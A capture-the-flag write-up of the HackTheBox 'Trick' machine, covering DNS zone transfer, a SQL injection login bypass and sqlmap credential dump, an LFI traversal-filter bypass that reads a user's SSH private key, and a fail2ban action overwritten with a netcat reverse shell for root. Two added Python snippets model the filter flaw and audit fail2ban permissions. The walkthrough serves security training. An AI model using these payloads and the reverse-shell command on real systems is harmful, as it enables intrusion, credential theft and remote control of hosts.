An easy Linux box from HackTheBox: get run around rabbit holes until finally discovering a subdomain with an LFI, grab an SSH key and use that for initial access, then exploit a vulnerable configuration of fail2ban for root.

Recon

I moved OSs to Pop!_OS; instead of getting Kali on a virtual machine I just opted to save a little hard drive space and only install the tools I need.

Running the usual nmap

sudo nmap -sC -sV -oA nmap/init 10.10.11.166

Running a gobuster

gobuster dir -w /opt/seclists/Discovery/Web-Content/raft-medium-directories.txt -x html -t 30 --url 10.10.11.166

Don't find anything but the JavaScript files and index.html

Now move to the DNS service running on port 53. Use dig to do a reverse lookup of 10.10.11.166, querying the name server at 10.10.11.166 directly

georgy@pop-os:~/Documents/htb/trick$ dig -x 10.10.11.166 @10.10.11.166

; <<>> DiG 9.18.1-1ubuntu1.2-Ubuntu <<>> -x 10.10.11.166 @10.10.11.166
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 47859
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 11cb663867b6648c6c9e92b263334e326d88fc4539154108 (good)
;; QUESTION SECTION:
;166.11.10.10.in-addr.arpa.	IN	PTR

;; ANSWER SECTION:
166.11.10.10.in-addr.arpa. 604800 IN	PTR	trick.htb.

;; AUTHORITY SECTION:
11.10.10.in-addr.arpa.	604800	IN	NS	trick.htb.

;; ADDITIONAL SECTION:
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1

;; Query time: 32 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (UDP)
;; WHEN: Tue Sep 27 15:25:38 EDT 2022
;; MSG SIZE  rcvd: 163

And find trick.htb!

Now we can try a zone transfer for maybe more information, and find preprod-payroll.trick.htb!

georgy@pop-os:~/Documents/htb/trick$ dig axfr trick.htb @trick.htb

; <<>> DiG 9.18.1-1ubuntu1.2-Ubuntu <<>> axfr trick.htb @trick.htb
;; global options: +cmd
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1
preprod-payroll.trick.htb. 604800 IN	CNAME	trick.htb.
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 40 msec
;; SERVER: 10.10.11.166#53(trick.htb) (TCP)
;; WHEN: Tue Sep 27 16:20:26 EDT 2022
;; XFR size: 6 records (messages 1, bytes 231)

Add preprod-payroll.trick.htb to /etc/hosts, and navigate to the site

On the site, try a simple SQL injection since the login page is .php

' or 1=1-- -

Into the username field, and log right in

Immediately see the “Users” section - maybe we can dump the administrator creds via the SQL injection?

Save the login request, and using sqlmap enumerate the databases present

georgy@pop-os:~/Documents/htb/trick$ sqlmap -r login.req --risk=3 --dbs

...
+---------------------+
| information_schema  |
| payroll_db          |
+---------------------+
...

sqlmap finds 2 databases, information_schema, and payroll_db - now enumerating payroll_db tables with

georgy@pop-os:~/Documents/htb/trick$ sqlmap -r login.req --risk=3 -D payroll_db --tables

...
+---------------------+
| position            |
| allowances          |
| attendance          |
| deductions          |
| department          |
| employee            |
| employee_allowances |
| employee_deductions |
| payroll             |
| payroll_items       |
| users               |
+---------------------+
...

sqlmap finds 11 tables, of which the “users” table is the most interesting - so let's dump its contents

georgy@pop-os:~/Documents/htb/trick$ sqlmap -r login.req --risk=3 -D payroll_db -T users --dump

And get some creds for the Administrator / Enemigoss user; the password is SuperGucciRainbowCake

Unfortunately, trying to SSH in as this user doesn't work, and since I've exhausted the preprod-payroll subdomain, maybe there are other preprod domains?

Using wfuzz

georgy@pop-os:~/Documents/htb/trick$ wfuzz -H "Host: preprod-FUZZ.trick.htb" -w /opt/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hh 5480 http://trick.htb

And it found “marketing”

Quickly add preprod-marketing.trick.htb to /etc/hosts, and navigate to the site

Clicking around, see that there is a direct in-URL reference to the page that I’m on

http://preprod-marketing.trick.htb/index.php?page=services.html

Maybe an LFI?

Try to go to

http://preprod-marketing.trick.htb/index.php?page=/etc/passwd

Doesn't work

http://preprod-marketing.trick.htb/index.php?page=../../../../../../../etc/passwd

Doesn't work

http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././..././etc/passwd

Works! We see /etc/passwd. It seems the site was filtering ../ out of the URL, but only in a single pass, so ..././ collapses back into ../ after the filter has run
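To see why the ..././ payload gets through, here is an added Python model of the filter (not code from the box or from the writeup). It assumes a one-pass removal of "../", a constructed web root of /var/www/marketing, and plain string concatenation of root and page, which together reproduce the outcome of all three attempts above. The hardened resolver beside it normalises the path and checks containment instead of trying to strip anything.

```python
import os
from typing import Optional

# Constructed web root for the model; the real document root is not on the page.
WEB_ROOT = "/var/www/marketing"

def strip_traversal_once(page: str) -> str:
    """The filter the writeup infers: '../' is removed in a single pass.
    Because the scan is non-recursive, '..././' loses its inner '../' and
    what remains is '../' again, so the traversal survives the filter."""
    return page.replace("../", "")

def resolve_naive(page: str) -> str:
    """Vulnerable resolver: filter once, concatenate to the root, normalise.
    Concatenation (not os.path.join) is assumed, which is why an absolute
    '/etc/passwd' stays under the root, matching the writeup's first attempt."""
    return os.path.normpath(WEB_ROOT + "/" + strip_traversal_once(page))

def resolve_hardened(page: str) -> Optional[str]:
    """Hardened resolver: do not sanitise the input at all. Normalise the full
    path, then require it to remain inside WEB_ROOT. commonpath is used rather
    than startswith so that '/var/www/marketing-old/...' is not accepted."""
    candidate = os.path.normpath(WEB_ROOT + "/" + page)
    if os.path.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None
    return candidate

if __name__ == "__main__":
    # The three attempts from the writeup, run through both resolvers.
    for payload in ("/etc/passwd",
                    "../../../../../../../etc/passwd",
                    "..././..././..././..././..././..././etc/passwd"):
        print(f"{payload!r:50} naive={resolve_naive(payload)} "
              f"hardened={resolve_hardened(payload)}")
```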

Exploitation

For just a simple LFI on what looks like a static webpage there aren't that many options, pretty much the only one being to read a private SSH key

So let's try it: find the “michael” user in the /etc/passwd file and see if we can read his private SSH key by going to the URL

http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././..././..././home/michael/.ssh/id_rsa

And we get it!


Copy it to the working directory as michael_ssh

And then connect via SSH to trick.htb, making sure to chmod 600 michael_ssh first

georgy@pop-os:~/Documents/htb/trick$ chmod 600 michael_ssh
georgy@pop-os:~/Documents/htb/trick$ ssh -i michael_ssh michael@trick.htb

Linux trick 4.19.0-20-amd64 #1 SMP Debian 4.19.235-1 (2022-03-17) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
michael@trick:~$ whoami
michael
michael@trick:~$

Now start enumerating the box, and find an interesting permission with sudo -l

michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart

Googling around, find a writeup for how to exploit this privilege for root

Essentially, since we are a member of the security group, we can modify how fail2ban works: whenever someone gets banned (for example after failing SSH auth 3 times), fail2ban runs the configured ban action

Usually this action bans them, but since we have write access to the action.d directory, we can overwrite the action config file and make it send a reverse shell instead of banning us

michael@trick:/etc/fail2ban$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)
michael@trick:/etc/fail2ban$ ls -la
total 76
drwxr-xr-x   6 root root      4096 Sep 27 23:57 .
drwxr-xr-x 126 root root     12288 Sep 27 21:51 ..
drwxrwx---   2 root security  4096 Sep 27 23:57 action.d
-rw-r--r--   1 root root      2334 Sep 27 23:57 fail2ban.conf
drwxr-xr-x   2 root root      4096 Sep 27 23:57 fail2ban.d
drwxr-xr-x   3 root root      4096 Sep 27 23:57 filter.d
-rw-r--r--   1 root root     22908 Sep 27 23:57 jail.conf
drwxr-xr-x   2 root root      4096 Sep 27 23:57 jail.d
-rw-r--r--   1 root root       645 Sep 27 23:57 paths-arch.conf
-rw-r--r--   1 root root      2827 Sep 27 23:57 paths-common.conf
-rw-r--r--   1 root root       573 Sep 27 23:57 paths-debian.conf
-rw-r--r--   1 root root       738 Sep 27 23:57 paths-opensuse.conf
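The condition shown in the listing above is a root:security 0770 action.d directory, combined with the sudo rule for restarting the service. The following is an added Python audit (not fail2ban's own tooling, nor code from the writeup) that walks a fail2ban config tree and reports every entry a non-root account could write; it assumes the configuration lives under /etc/fail2ban and treats only the root group as trusted unless told otherwise. build_demo_tree constructs a stand-in for the box's listing so the audit can be run offline.

```python
import os
import stat
import tempfile
from typing import Iterable, List, Tuple

FAIL2BAN_ROOT = "/etc/fail2ban"  # where the box keeps its config (see ls -la above)

def writable_by_untrusted(path: str, trusted_gids: Iterable[int]) -> bool:
    """True when a non-root account could modify the entry: world-writable, or
    group-writable by a group outside trusted_gids. A root:security 0770
    action.d is exactly this case, and it is what let michael add his own action."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return False  # a symlink's own bits are meaningless; os.walk does not follow links
    if st.st_mode & stat.S_IWOTH:
        return True
    return bool(st.st_mode & stat.S_IWGRP) and st.st_gid not in set(trusted_gids)

def audit_fail2ban_tree(root: str = FAIL2BAN_ROOT,
                        trusted_gids: Iterable[int] = (0,)) -> List[Tuple[str, str]]:
    """Walk the config tree and return (path relative to root, mode string) for
    every directory or file an untrusted account could write. Empty means clean."""
    trusted = set(trusted_gids)
    findings = []
    for dirpath, _subdirs, filenames in os.walk(root):
        for path in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
            if writable_by_untrusted(path, trusted):
                mode = stat.filemode(os.lstat(path).st_mode)
                findings.append((os.path.relpath(path, root), mode))
    return sorted(findings)

def build_demo_tree() -> str:
    """Constructed stand-in for the box's /etc/fail2ban: 0755 directories and
    0644 files, except action.d at 0770 as in the writeup's listing."""
    root = tempfile.mkdtemp(prefix="fail2ban-demo-")
    os.chmod(root, 0o755)
    for sub, mode in (("action.d", 0o770), ("filter.d", 0o755), ("jail.d", 0o755)):
        os.mkdir(os.path.join(root, sub))
        os.chmod(os.path.join(root, sub), mode)  # explicit chmod: mkdir is umask-masked
    for name in ("fail2ban.conf", "jail.conf"):
        with open(os.path.join(root, name), "w") as fh:
            fh.write("# constructed placeholder, not the real config\n")
        os.chmod(os.path.join(root, name), 0o644)
    return root

if __name__ == "__main__":
    # On a live host run as root so every entry under /etc/fail2ban can be listed.
    for rel, mode in audit_fail2ban_tree() or [("(nothing writable by non-root)", "")]:
        print(mode, rel)
```

Passing trusted_gids=() makes every group-writable entry a finding, which is useful when the tree is owned by a test user rather than root.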

The file we want to create is iptables-multiport.conf in the temp directory, with the ban action changed to a netcat reverse shell that fires when someone is banned

# inside of the iptables-multiport.conf file copied from /etc/fail2ban/action.d
# edit this line and save the file

...
actionban = /usr/bin/nc -e /usr/bin/bash 10.10.14.9 9999
...

Then overwrite the conf file

michael@trick:/tmp$ mv iptables-multiport.conf /etc/fail2ban/action.d/

Then start a listener on 9999 and restart the service with

michael@trick:/tmp$ sudo /etc/init.d/fail2ban restart

Then fail authentication to the SSH server a bunch of times

michael@trick:~$ ssh nope@trick.htb
nopeane@trick.htb's password: 
Permission denied, please try again.
nopeane@trick.htb's password: 
Permission denied, please try again.
nopeane@trick.htb's password: 
Permission denied, please try again.

michael@trick:~$ ssh nope@trick.htb
nopeane@trick.htb's password: 
Permission denied, please try again.
nopeane@trick.htb's password: 
Permission denied, please try again.
nopeane@trick.htb's password: 
Permission denied, please try again.

michael@trick:~$ ssh nope@trick.htb
nopeane@trick.htb's password: 
Permission denied, please try again.
nopeane@trick.htb's password: 
Permission denied, please try again.
nopeane@trick.htb's password: 
Permission denied, please try again.

michael@trick:~$ ssh nope@trick.htb
nopeane@trick.htb's password: 
Permission denied, please try again.
nopeane@trick.htb's password: 
Permission denied, please try again.
nopeane@trick.htb's password: 
Permission denied, please try again.

...
...
...

And catch the root shell!

Listening on 0.0.0.0 9999
Connection received on 10.10.11.166 58084
whoami
root